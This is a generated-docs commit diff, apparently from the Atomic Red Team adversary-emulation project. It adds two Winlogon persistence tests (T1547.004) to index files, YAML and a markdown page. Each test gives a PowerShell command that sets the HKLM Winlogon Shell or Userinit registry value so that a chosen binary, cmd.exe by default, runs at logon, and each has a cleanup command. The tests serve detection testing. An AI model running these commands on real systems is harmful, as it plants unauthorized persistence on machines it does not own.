Generated docs from job=generate-docs branch=master [ci skip]

2022-10-24 16:27:34 +00:00
parent 890607b6fe
commit e4844d7576
8 changed files with 192 additions and 2 deletions
@@ -520,6 +520,8 @@ privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Set
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
+privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
+privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
@@ -756,6 +758,8 @@ persistence,T1136.001,Create Account: Local Account,6,Create a new Windows admin
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
+persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
+persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
 persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
 persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
@@ -384,6 +384,8 @@ privilege-escalation,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM s
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
+privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
+privilege-escalation,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
 privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
@@ -562,6 +564,8 @@ persistence,T1136.001,Create Account: Local Account,6,Create a new Windows admin
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell
 persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell
+persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,4,Winlogon HKLM Shell Key Persistence - PowerShell,95a3c42f-8c88-4952-ad60-13b81d929a9d,powershell
+persistence,T1547.004,Boot or Logon Autostart Execution: Winlogon Helper DLL,5,Winlogon HKLM Userinit Key Persistence - PowerShell,f9b8daff-8fa7-4e6a-a1a7-7c14675a545b,powershell
 persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
 persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
 persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
@@ -794,6 +794,8 @@
  - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
  - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
  - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
+  - Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
+  - Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
 - [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
  - Atomic Test #1: IFEO Add Debugger [windows]
  - Atomic Test #2: IFEO Global Flags [windows]
@@ -1231,6 +1233,8 @@
  - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
  - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
  - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
+  - Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
+  - Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
 - T1019 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1042 Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -593,6 +593,8 @@
  - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
  - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
  - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
+  - Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
+  - Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
 - [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
  - Atomic Test #1: IFEO Add Debugger [windows]
  - Atomic Test #2: IFEO Global Flags [windows]
@@ -909,6 +911,8 @@
  - Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
  - Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
  - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
+  - Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
+  - Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
 - T1019 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1042 Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -33810,6 +33810,52 @@ privilege-escalation:
        cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
          -Force -ErrorAction Ignore

+          '
+        name: powershell
+    - name: Winlogon HKLM Shell Key Persistence - PowerShell
+      auto_generated_guid: 95a3c42f-8c88-4952-ad60-13b81d929a9d
+      description: |
+        PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
+
+        Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_to_execute:
+          description: Path of binary to execute
+          type: Path
+          default: C:\Windows\System32\cmd.exe
+      executor:
+        command: 'Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
+          "Shell" "explorer.exe, #{binary_to_execute}" -Force
+
+          '
+        cleanup_command: 'Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows
+          NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
+
+          '
+        name: powershell
+    - name: Winlogon HKLM Userinit Key Persistence - PowerShell
+      auto_generated_guid: f9b8daff-8fa7-4e6a-a1a7-7c14675a545b
+      description: |
+        PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
+
+        Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_to_execute:
+          description: Path of binary to execute
+          type: Path
+          default: C:\Windows\System32\cmd.exe
+      executor:
+        command: 'Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
+          "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
+
+          '
+        cleanup_command: 'Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows
+          NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
+
          '
        name: powershell
  T1546.012:
@@ -55052,6 +55098,52 @@ persistence:
        cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
          -Force -ErrorAction Ignore

+          '
+        name: powershell
+    - name: Winlogon HKLM Shell Key Persistence - PowerShell
+      auto_generated_guid: 95a3c42f-8c88-4952-ad60-13b81d929a9d
+      description: |
+        PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
+
+        Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_to_execute:
+          description: Path of binary to execute
+          type: Path
+          default: C:\Windows\System32\cmd.exe
+      executor:
+        command: 'Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
+          "Shell" "explorer.exe, #{binary_to_execute}" -Force
+
+          '
+        cleanup_command: 'Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows
+          NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
+
+          '
+        name: powershell
+    - name: Winlogon HKLM Userinit Key Persistence - PowerShell
+      auto_generated_guid: f9b8daff-8fa7-4e6a-a1a7-7c14675a545b
+      description: |
+        PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
+
+        Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_to_execute:
+          description: Path of binary to execute
+          type: Path
+          default: C:\Windows\System32\cmd.exe
+      executor:
+        command: 'Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
+          "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
+
+          '
+        cleanup_command: 'Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows
+          NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
+
          '
        name: powershell
  T1019:
@@ -18,6 +18,10 @@ Adversaries may take advantage of these features to repeatedly execute malicious

 - [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell)

+- [Atomic Test #4 - Winlogon HKLM Shell Key Persistence - PowerShell](#atomic-test-4---winlogon-hklm-shell-key-persistence---powershell)
+
+- [Atomic Test #5 - Winlogon HKLM Userinit Key Persistence - PowerShell](#atomic-test-5---winlogon-hklm-userinit-key-persistence---powershell)
+

 <br/>

@@ -136,4 +140,82 @@ Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"



+<br/>
+<br/>
+
+## Atomic Test #4 - Winlogon HKLM Shell Key Persistence - PowerShell
+PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
+
+Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 95a3c42f-8c88-4952-ad60-13b81d929a9d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| binary_to_execute | Path of binary to execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Winlogon HKLM Userinit Key Persistence - PowerShell
+PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
+
+Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f9b8daff-8fa7-4e6a-a1a7-7c14675a545b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| binary_to_execute | Path of binary to execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>